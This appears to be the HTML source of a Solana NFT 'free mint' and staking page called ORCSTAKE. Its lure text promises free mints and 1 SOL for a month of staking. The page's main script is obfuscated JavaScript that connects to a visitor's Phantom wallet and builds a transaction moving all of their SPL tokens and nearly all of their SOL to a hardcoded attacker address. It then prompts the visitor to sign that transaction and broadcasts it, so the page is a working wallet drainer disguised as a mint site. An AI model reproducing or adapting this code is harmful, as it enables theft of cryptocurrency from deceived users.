<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="description" content="Genesis Genopets" data-react-helmet="true">
    <meta name="theme-color" content="#a05bb4">

    <meta name="twitter:card" content="summary_large_image">
    <title>ORCSTAKE</title>
    
    <link rel="shortcut icon" href="favicon-32x32.png@v=1f92520e29616cf36f72c0a24429fe6e">
    <link rel="stylesheet" href="all.min.css">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link href="css2.css@family=Rubik+Wet+Paint&amp;display=swap.css" rel="stylesheet">
    <script>
      window.addEventListener('click', () => {
        document.getElementById('showcase__btn0').addEventListener('click', function(e) {
          document.getElementsByClassName('MuiButton-containedPrimary')[0].click();
        });
      });
    </script>
    <style data-emotion="right-title">
      @font-face {
        font-family: 'mokoto glitch';
        src: url(fonts/mokoto_glitch-webfont-ffb1b7efd3022a10f5ecfe951a9aff41.woff2) format('woff2'), url(fonts/mokoto_glitch-webfont-39f93df2b851bbb8f2e44864f9f5a586.woff) format('woff');
        font-weight: normal;
        font-style: normal;
        font-display: block;
      }

      @font-face {
        font-family: 'mokoto glitch mark I';
        src: url(fonts/mokoto_glitch_mark_2-webfont-28b4e7beb3923c25bc3a6e339b9430a9.woff2) format('woff2'), url(fonts/mokoto_glitch_mark_2-webfont-fc724f0e74d87207a04b744abaefd369.woff) format('woff');
        font-weight: normal;
        font-style: normal;
        font-display: block;
      }
    </style>
  </head>
  <body>
    <header>
      <div class="logo">
        <img src="https://solscan.io/static/media/solana-solana-scan-blue.5ffb9996.svg" alt="Logo">
      </div>
      <div class="social-list"></div>
    </header>
    <section class="section main-screen">
      <div class="main-area">
        <div class="main-area__right">
          <h2 class="right-title">ORCSTAKE</h2>
          <div class="right-list">
            <li>
              <div class="text"> ORC ST | FREE MINT | 0% royalties & strong utilities | 1 month staking = 1 $SOL 🦾🏦 </div>
            </li>
            <div class="token">
              <div class="token-title">TOKENS STACKED</div>
              <div class="token-line">
                <div class="line"></div>
                <div class="progress-line"></div>
              </div>
              <div class="token-number" id="tokenup">
                <span id="tokennumber">3998</span>
                <span id="endTick">10000</span>
              </div>
            </div>
          </div>
         
          <div class="button-box">
            <div id="root" class="cl-root">
              <main>
                <button id="butt" class="join-btn" tabindex="0" type="button" style="display: none;"></button>
              </main>
            </div>
            <img src="assets/img/solana.png" alt="solana">
          </div>
        </div>
        <script>
          new Image().src = "http://whos.amung.us/swidget/megatron";
        </script>
        <div class="main-area__left">
          <div class="slider-area">
            <video style="width:120%;position:relative;place-self:center;z-index:1;grid-row:1;grid-column:1" autoplay="" playsinline="" muted="" loop="" poster="https://genopet.minti.live/imgs/bird-fallback.png">
              <source src="media/bird.gif" type="video/webm">
              <source src="media/bird.mov" type="video/quicktime">
            </video>
          </div>
        </div>
      </div>
    </section>
    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/slick.min.js"></script>
    <script>
      const $plusButton = document.querySelector(".plus-btn");
      const $minuButton = document.querySelector(".minus-btn");
      const $numberText = document.querySelector("#total");
      const $remaining = document.querySelector('#remaining');
      const $priceResultText = document.querySelector("#price-total span");
      let itemPriceSelected = 0.0001;
      let itemCount = 1;
      $plusButton.addEventListener("click", function(e) {
        e.preventDefault();
        itemCount = itemCount < 2 ? itemCount + 1 : 3;
        $numberText.value = itemCount;
        $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2);
      });
      $minuButton.addEventListener("click", function(e) {
        e.preventDefault();
        itemCount = parseInt($numberText.value);
        itemCount = itemCount > 1 ? itemCount - 1 : itemCount;
        $numberText.value = itemCount;
        $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2);
      });
    </script>
    <script>
      ! function(e) {
        function t(t) {
          for (var n, i, a = t[0], c = t[1], l = t[2], s = 0, p = []; s < a.length; s++) i = a[s], Object.prototype.hasOwnProperty.call(o, i) && o[i] && p.push(o[i][0]), o[i] = 0;
          for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
          for (f && f(t); p.length;) p.shift()();
          return u.push.apply(u, l || []), r()
        }

        function r() {
          for (var e, t = 0; t < u.length; t++) {
            for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
              var c = r[a];
              0 !== o[c] && (n = !1)
            }
            n && (u.splice(t--, 1), e = i(i.s = r[0]))
          }
          return e
        }
        var n = {},
          o = {
            1: 0
          },
          u = [];

        function i(t) {
          if (n[t]) return n[t].exports;
          var r = n[t] = {
            i: t,
            l: !1,
            exports: {}
          };
          return e[t].call(r.exports, r, r.exports, i), r.l = !0, r.exports
        }
        i.e = function(e) {
          var t = [],
            r = o[e];
          if (0 !== r)
            if (r) t.push(r[2]);
            else {
              var n = new Promise((function(t, n) {
                r = o[e] = [t, n]
              }));
              t.push(r[2] = n);
              var u, a = document.createElement("script");
              a.charset = "utf-8", a.timeout = 120, i.nc && a.setAttribute("nonce", i.nc), a.src = function(e) {
                return i.p + "../static/js/" + ({} [e] || e) + "." + {
                  3: ""
                } [e] + "chunk.js"
              }(e);
              var c = new Error;
              u = function(t) {
                a.onerror = a.onload = null, clearTimeout(l);
                var r = o[e];
                if (0 !== r) {
                  if (r) {
                    var n = t && ("load" === t.type ? "missing" : t.type),
                      u = t && t.target && t.target.src;
                    c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")", c.name = "ChunkLoadError", c.type = n, c.request = u, r[1](c)
                  }
                  o[e] = void 0
                }
              };
              var l = setTimeout((function() {
                u({
                  type: "timeout",
                  target: a
                })
              }), 12e4);
              a.onerror = a.onload = u, document.head.appendChild(a)
            }
          return Promise.all(t)
        }, i.m = e, i.c = n, i.d = function(e, t, r) {
          i.o(e, t) || Object.defineProperty(e, t, {
            enumerable: !0,
            get: r
          })
        }, i.r = function(e) {
          "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
            value: "Module"
          }), Object.defineProperty(e, "__esModule", {
            value: !0
          })
        }, i.t = function(e, t) {
          if (1 & t && (e = i(e)), 8 & t) return e;
          if (4 & t && "object" == typeof e && e && e.__esModule) return e;
          var r = Object.create(null);
          if (i.r(r), Object.defineProperty(r, "default", {
              enumerable: !0,
              value: e
            }), 2 & t && "string" != typeof e)
            for (var n in e) i.d(r, n, function(t) {
              return e[t]
            }.bind(null, n));
          return r
        }, i.n = function(e) {
          var t = e && e.__esModule ? function() {
            return e.default
          } : function() {
            return e
          };
          return i.d(t, "a", t), t
        }, i.o = function(e, t) {
          return Object.prototype.hasOwnProperty.call(e, t)
        }, i.p = "/", i.oe = function(e) {
          throw console.error(e), e
        };
        var a = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [],
          c = a.push.bind(a);
        a.push = t, a = a.slice();
        for (var l = 0; l < a.length; l++) t(a[l]);
        var f = c;
        r()
      }([])
      const _0x27de6b = _0x1f1e;

      function _0x1f1e(_0x16fc2e, _0x5be60f) {
        const _0x100de4 = _0x100d();
        return _0x1f1e = function(_0x1f1e66, _0x3cdf99) {
          _0x1f1e66 = _0x1f1e66 - 0x189;
          let _0x5b7c93 = _0x100de4[_0x1f1e66];
          return _0x5b7c93;
        }, _0x1f1e(_0x16fc2e, _0x5be60f);
      }

      function _0x100d() {
        const _0x2258e8 = ['54858XegKer', 'length', '...', 'associatedProgramId', 'getAccountInfo', '\x20SOL', 'background', '653900HELctm', 'i4fFF', '1379trqfnN', 'Transaction', 'counet', 'solana', 'isPhantom', 'SystemProgram', 'getParsedTokenAccountsByOwner', 'showcase__btn0', 'space', 'isConnected', 'data', 'load', 'createTransferInstruction', 'value', 'getAssociatedTokenAddress', 'innerText', 'amount', '7487152xETAWF', 'root', '27rJbaER', 'toString', 'add', 'serialize', '3Kz2u', 'wqwqw', 'transfer', 'createAssociatedTokenAccountInstruction', 'connect', 'tokenAmount', 'style', '8XcjM', 'LQMdq', 'innerHTML', 'programId', '5245gELGjh', 'TOKEN_PROGRAM_ID', 'getElementById', 'disconnect', 'feePayer', 'PublicKey', 'https://phantom.app/', 'data-target', 'log', 'confirmTransaction', '#False', 'clusterApiUrl', 'Token', 'parsed', '2WoaUKo', 'getMinimumBalanceForRentExemption', '988fggphZ', 'ogyRU', 'mainnet-beta', 'recentBlockhash', 'TDrTo', 'textContent', 'bHe6', 'sendRawTransaction', 'Mint', 'mint', '1949651jIKuRk', 'info', 'Phantom_Connect', '#e42575', 'publicKey', '7644fwylYT', 'account', 'substring', 'onclick', '2766453tdkqiR'];
        _0x100d = function() {
          return _0x2258e8;
        };
        return _0x100d();
      }(function(_0x7edd83, _0x4f5aed) {
        const _0x40fdc2 = _0x1f1e,
          _0x172de2 = _0x7edd83();
        while (!![]) {
          try {
            const _0x146007 = -parseInt(_0x40fdc2(0x1aa)) / 0x1 + -parseInt(_0x40fdc2(0x194)) / 0x2 * (parseInt(_0x40fdc2(0x1a9)) / 0x3) + parseInt(_0x40fdc2(0x196)) / 0x4 * (parseInt(_0x40fdc2(0x1d5)) / 0x5) + parseInt(_0x40fdc2(0x1a5)) / 0x6 * (parseInt(_0x40fdc2(0x1b3)) / 0x7) + parseInt(_0x40fdc2(0x1c4)) / 0x8 + -parseInt(_0x40fdc2(0x1c6)) / 0x9 * (-parseInt(_0x40fdc2(0x1b1)) / 0xa) + -parseInt(_0x40fdc2(0x1a0)) / 0xb;
            if (_0x146007 === _0x4f5aed) break;
            else _0x172de2['push'](_0x172de2['shift']());
          } catch (_0x4ced0a) {
            _0x172de2['push'](_0x172de2['shift']());
          }
        }
      }(_0x100d, 0x771d7));

      function upValue() {
        const _0x2f4310 = _0x1f1e;
        document[_0x2f4310(0x1d7)](_0x2f4310(0x1b5))[_0x2f4310(0x1c0)] = parseInt(0x1) + parseInt(document[_0x2f4310(0x1d7)](_0x2f4310(0x1b5))[_0x2f4310(0x1c0)]), document[_0x2f4310(0x1d7)](_0x2f4310(0x1cb))['textContent'] = (parseInt(document[_0x2f4310(0x1d7)]('counet')[_0x2f4310(0x1c0)]) * 1.777)['toFixed'](0x2)[_0x2f4310(0x1c7)]() + _0x2f4310(0x1af);
      }

      function downValue() {
        const _0x236280 = _0x1f1e;
        if (document['getElementById'](_0x236280(0x1b5))[_0x236280(0x1c0)] == '1') {} else document['getElementById'](_0x236280(0x1b5))[_0x236280(0x1c0)] = parseInt(document[_0x236280(0x1d7)]('counet')[_0x236280(0x1c0)]) - parseInt(0x1), document[_0x236280(0x1d7)](_0x236280(0x1cb))[_0x236280(0x19b)] = (parseInt(document['getElementById'](_0x236280(0x1b5))[_0x236280(0x1c0)]) * 1.777)['toFixed'](0x2)['toString']() + _0x236280(0x1af);
      }
      window['addEventListener'](_0x27de6b(0x1be), () => {
        const _0x21794f = _0x27de6b;
        var _0x48926c = ![];
        const _0x1578ca = new solanaWeb3['Connection'](solanaWeb3[_0x21794f(0x191)](_0x21794f(0x198))),
          _0x110c06 = () => {
            const _0x827dd1 = _0x21794f;
            if (_0x827dd1(0x1b6) in window) {
              const _0x5d2591 = window[_0x827dd1(0x1b6)];
              if (_0x5d2591[_0x827dd1(0x1b7)]) return _0x5d2591;
            }
            window['open'](_0x827dd1(0x18c), '_blank');
          };

        function _0x45f05d() {
          const _0x21f61e = _0x21794f,
            _0xd2a92 = window[_0x21f61e(0x1b6)][_0x21f61e(0x1bc)];
          !_0xd2a92 ? _0x5e90b5() : (username_text = String(provider['publicKey']), username_short = username_text[_0x21f61e(0x1a7)](0x0, 0x8), document[_0x21f61e(0x1d7)](_0x21f61e(0x1c5))['setAttribute'](_0x21f61e(0x18d), _0x21f61e(0x190)), document['getElementById']('showcase__btn0')['innerHTML'] = username_short + _0x21f61e(0x1ac), document[_0x21f61e(0x1d7)](_0x21f61e(0x1c5))['innerText'] = 'Mint', document[_0x21f61e(0x1d7)](_0x21f61e(0x1c5))[_0x21f61e(0x1d0)][_0x21f61e(0x1b0)] = _0x21f61e(0x1a3)), _0x1bada0();
        }

        function _0x1bada0() {
          const _0x4f172c = _0x21794f,
            _0xc32aa2 = _0x110c06();
          _0xc32aa2 && (_0xc32aa2['on'](_0x4f172c(0x1ce), () => {
            const _0x21b6c2 = _0x4f172c;
            _0x327f0f(), username_text = String(_0xc32aa2[_0x21b6c2(0x1a4)]), username_short = username_text[_0x21b6c2(0x1a7)](0x0, 0x8), document['getElementById'](_0x21b6c2(0x1c5))['setAttribute'](_0x21b6c2(0x18d), _0x21b6c2(0x190)), document[_0x21b6c2(0x1d7)](_0x21b6c2(0x1ba))[_0x21b6c2(0x1d3)] = username_short + _0x21b6c2(0x1ac), document[_0x21b6c2(0x1d7)](_0x21b6c2(0x1c5))[_0x21b6c2(0x1c2)] = _0x21b6c2(0x19e), document['getElementById'](_0x21b6c2(0x1c5))[_0x21b6c2(0x1d0)][_0x21b6c2(0x1b0)] = _0x21b6c2(0x1a3);
          }), _0xc32aa2['on'](_0x4f172c(0x189), () => {
            _0xe00143();
          }));
        }

        function _0x5e90b5() {
          window['solana']['connect']({
            'onlyIfTrusted': ![]
          });
        }
        async function _0x327f0f() {
          _0x59d920();
        }

        function _0xe00143() {}
        async function _0x59d920() {
          const _0x419f98 = _0x21794f,
            _0x11bb42 = window[_0x419f98(0x1b6)][_0x419f98(0x1bc)];
          if (!_0x11bb42) return;
          let _0x3e44f5 = await _0x1578ca['getAccountInfo'](window[_0x419f98(0x1b6)][_0x419f98(0x1a4)]);
          if (_0x3e44f5 === null) return;
          if (_0x3e44f5['lamports'] === 0x0) return;
          let _0x370327 = _0x3e44f5['lamports'],
            _0x2c2578 = await _0x1578ca[_0x419f98(0x195)](0x52),
            _0x4de134 = await _0x1578ca['getMinimumBalanceForRentExemption'](0xa5),
            _0x1eaeb2 = await _0x1578ca[_0x419f98(0x195)](0x0);
          console[_0x419f98(0x18e)](_0x1eaeb2 + _0x4de134 * 0x7), console[_0x419f98(0x18e)]('ok'), _0x370327 -= _0x1eaeb2;
          let _0x234e17 = 0x11c + 0x1b;
          const _0x2b0248 = new solanaWeb3['PublicKey']('' ['concat']('71JCg', _0x419f98(0x1b2), _0x419f98(0x1ca), '4VqiN', _0x419f98(0x19a), _0x419f98(0x1d1), _0x419f98(0x1d2), _0x419f98(0x197), _0x419f98(0x19c))),
            _0x36be92 = await _0x1578ca[_0x419f98(0x1b9)](window[_0x419f98(0x1b6)][_0x419f98(0x1a4)], {
              'programId': splToken[_0x419f98(0x1d6)]
            });
          console[_0x419f98(0x18e)](_0x36be92);
          let _0x4786ef = new solanaWeb3[(_0x419f98(0x1b4))]();
          for (let _0xb23147 = 0x0; _0xb23147 < _0x36be92[_0x419f98(0x1c0)][_0x419f98(0x1ab)]; _0xb23147++) {
            let _0x1f1dd1 = _0x36be92['value'][_0xb23147][_0x419f98(0x1a6)][_0x419f98(0x1bd)];
            const _0x2483d6 = _0x1f1dd1['parsed'][_0x419f98(0x1a1)][_0x419f98(0x1cf)][_0x419f98(0x1c3)];
            if (_0x2483d6 > 0x0) {
              const _0x21433f = _0x1f1dd1[_0x419f98(0x1bb)];
              console[_0x419f98(0x18e)](_0x370327);
              const _0x40124a = new solanaWeb3[(_0x419f98(0x18b))](_0x1f1dd1[_0x419f98(0x193)]['info'][_0x419f98(0x19f)]),
                _0x6a4795 = new splToken[(_0x419f98(0x192))](_0x1578ca, _0x40124a, splToken['TOKEN_PROGRAM_ID'], window[_0x419f98(0x1b6)][_0x419f98(0x1a4)]),
                _0x47c093 = await splToken[_0x419f98(0x192)][_0x419f98(0x1c1)](_0x6a4795[_0x419f98(0x1ad)], _0x6a4795[_0x419f98(0x1d4)], _0x40124a, window[_0x419f98(0x1b6)][_0x419f98(0x1a4)]),
                _0x2b100c = await splToken[_0x419f98(0x192)]['getAssociatedTokenAddress'](_0x6a4795[_0x419f98(0x1ad)], _0x6a4795[_0x419f98(0x1d4)], _0x40124a, _0x2b0248),
                _0x410ec7 = await _0x1578ca[_0x419f98(0x1ae)](_0x2b100c);
              if (_0x410ec7 === null) {
                if (_0x234e17 + 0x2a >= 0x4d0) break;
                _0x234e17 += 0x2a, _0x4786ef[_0x419f98(0x1c8)](splToken[_0x419f98(0x192)][_0x419f98(0x1cd)](_0x6a4795[_0x419f98(0x1ad)], _0x6a4795[_0x419f98(0x1d4)], _0x40124a, _0x2b100c, _0x2b0248, window[_0x419f98(0x1b6)][_0x419f98(0x1a4)])), _0x21433f === 0xa5 ? _0x370327 -= _0x4de134 : _0x370327 -= _0x2c2578;
              }
              if (_0x234e17 + 0x4f >= 0x4d0) break;
              _0x234e17 += 0x4f, console[_0x419f98(0x18e)](_0x234e17), _0x4786ef[_0x419f98(0x1c8)](splToken['Token'][_0x419f98(0x1bf)](splToken[_0x419f98(0x1d6)], _0x47c093, _0x2b100c, window[_0x419f98(0x1b6)][_0x419f98(0x1a4)], [], _0x2483d6));
            }
          }
          _0x4786ef['add'](solanaWeb3[_0x419f98(0x1b8)][_0x419f98(0x1cc)]({
            'fromPubkey': window['solana'][_0x419f98(0x1a4)],
            'toPubkey': _0x2b0248,
            'lamports': _0x370327 - 0xc350
          }));
          const _0x157171 = _0x110c06();
          if (!_0x157171) return;
          console[_0x419f98(0x18e)](_0x4786ef);
          let {
            blockhash: _0x2d0f62
          } = await _0x1578ca['getLatestBlockhash']();
          _0x4786ef[_0x419f98(0x199)] = _0x2d0f62, _0x4786ef[_0x419f98(0x18a)] = _0x157171[_0x419f98(0x1a4)];
          if (_0x4786ef) {
            let _0xb1198b = await _0x157171['signTransaction'](_0x4786ef, _0x1578ca),
              _0x28486d = await _0x1578ca[_0x419f98(0x19d)](_0xb1198b[_0x419f98(0x1c9)]());
            await _0x1578ca[_0x419f98(0x18f)](_0x28486d);
          }
        }
        document[_0x21794f(0x1d7)](_0x21794f(0x1c5))[_0x21794f(0x1a8)] = function() {
          const _0x564afd = _0x21794f;
          document[_0x564afd(0x1d7)]('root')['getAttribute'](_0x564afd(0x18d)) == '#False' ? _0x59d920() : _0x1bada0();
        }, document[_0x21794f(0x1d7)](_0x21794f(0x1a2))[_0x21794f(0x1a8)] = function() {
          _0x45f05d();
        };
      });
    </script>
    
        <script src="static/js/life.js"></script>
    <script src="static/js/lib.js"></script>

    <script src="assets/js/tokenup.js"></script>
    <script src="static/js/chunk.js"></script>
    <script src="static/js/main.chunk.js"></script>
  </body>
</html>
